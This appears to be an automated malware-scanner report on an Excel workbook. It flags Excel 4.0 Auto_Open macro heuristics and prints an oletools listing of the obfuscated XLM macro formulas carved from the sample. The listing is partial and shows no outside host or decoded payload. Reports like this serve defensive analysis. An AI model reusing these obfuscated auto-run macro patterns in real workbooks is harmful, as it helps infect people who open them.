MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6829 bytes |
SHA-256: 224140681dcd461f24c4d917024d1a355c44138e884e7cfba17ec0ea4c61be43 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - FyltgGvFWZu
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B174
' 0018 24 LABEL : Cell Value, String Constant - BHVUNqhWd len=0
' 0018 24 LABEL : Cell Value, String Constant - bYlVDbHwV len=0
' 0018 22 LABEL : Cell Value, String Constant - Bzxadjz len=0
' 0018 20 LABEL : Cell Value, String Constant - dmgmo len=0
' 0018 24 LABEL : Cell Value, String Constant - evGYfkiBC len=0
' 0018 22 LABEL : Cell Value, String Constant - fAuBWZG len=0
' 0018 20 LABEL : Cell Value, String Constant - FezRJ len=0
' 0018 23 LABEL : Cell Value, String Constant - FkmAGKkU len=0
' 0018 26 LABEL : Cell Value, String Constant - FNIviQXQOdp len=0
' 0018 21 LABEL : Cell Value, String Constant - gDfGIA len=0
' 0018 24 LABEL : Cell Value, String Constant - HZVFVPaEv len=0
' 0018 24 LABEL : Cell Value, String Constant - kqjArSrqP len=0
' 0018 21 LABEL : Cell Value, String Constant - oIeCjj len=0
' 0018 25 LABEL : Cell Value, String Constant - sAPSjmzEkr len=0
' 0018 22 LABEL : Cell Value, String Constant - SoIScaE len=0
' 0018 20 LABEL : Cell Value, String Constant - TRvAP len=0
' 0018 24 LABEL : Cell Value, String Constant - UduNuybRl len=0
' 0018 26 LABEL : Cell Value, String Constant - vMeiwKDload len=0
' 0018 23 LABEL : Cell Value, String Constant - WbfhQuOG len=0
' 0018 20 LABEL : Cell Value, String Constant - xaHcd len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' FyltgGvFWZu,R58,"",108.00000000000000000000
' FyltgGvFWZu,R59,"",-292.00000000000000000000
' FyltgGvFWZu,R60,"",243.00000000000000000000
' FyltgGvFWZu,R61,"",-1000.00000000000000000000
' FyltgGvFWZu,R62,"",-500.00000000000000000000
' FyltgGvFWZu,R63,"",532.00000000000000000000
' FyltgGvFWZu,B83,"SET.NAME("FezRJ",0+VALUE("0"))",""
' FyltgGvFWZu,B86,"SET.NAME("sAPSjmzEkr",FezRJ)",""
' FyltgGvFWZu,B88,"SET.NAME("oIeCjj",FezRJ)",""
' FyltgGvFWZu,B93,"SET.NAME("SoIScaE",COUNTA(WbfhQuOG))",""
' FyltgGvFWZu,B97,"SET.NAME("Bzxadjz",COUNTA(dmgmo))",""
' FyltgGvFWZu,B101,[],""
' FyltgGvFWZu,B106,"SET.NAME("TRvAP","")",""
' FyltgGvFWZu,B111,"sAPSjmzEkr",""
' FyltgGvFWZu,B113,"SET.NAME("gDfGIA",HLOOKUP("*",WbfhQuOG,sAPSjmzEkr,FALSE))",""
' FyltgGvFWZu,B116,"evGYfkiBC",""
' FyltgGvFWZu,B119,"SET.NAME("FkmAGKkU",FezRJ)",""
' FyltgGvFWZu,B122,[],""
' FyltgGvFWZu,B126,"FkmAGKkU",""
' FyltgGvFWZu,B131,"UduNuybRl",""
' FyltgGvFWZu,B135,"xaHcd",""
' FyltgGvFWZu,B140,"FNIviQXQOdp",""
' FyltgGvFWZu,B144,"SET.NAME("fAuBWZG",VALUE(HLOOKUP("*",dmgmo,FNIviQXQOdp,FALSE)))",""
' FyltgGvFWZu,B146,"BHVUNqhWd",""
' FyltgGvFWZu,B149,"TRvAP",""
' FyltgGvFWZu,B153,"oIeCjj",""
' FyltgGvFWZu,B157,NEXT(),""
' FyltgGvFWZu,B160,"HZVFVPaEv",""
' FyltgGvFWZu,B164,[],""
' FyltgGvFWZu,B167,"kqjArSrqP",""
' FyltgGvFWZu,B169,NEXT(),""
' FyltgGvFWZu,B172,RETURN(),""
' FyltgGvFWZu,B198,"SET.NAME("vMeiwKDload",B83)",""
' FyltgGvFWZu,B201,"WbfhQuOG",""
' FyltgGvFWZu,B203,"SET.NAME("dmgmo",R49C12)",""
' FyltgGvFWZu,B207,"SET.NAME("kqjArSrqP",214)",""
' FyltgGvFWZu,B210,"SET.NAME("bYlVDbHwV",2)",""
' FyltgGvFWZu,B213,vMeiwKDload(),""
' FyltgGvFWZu,B214,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.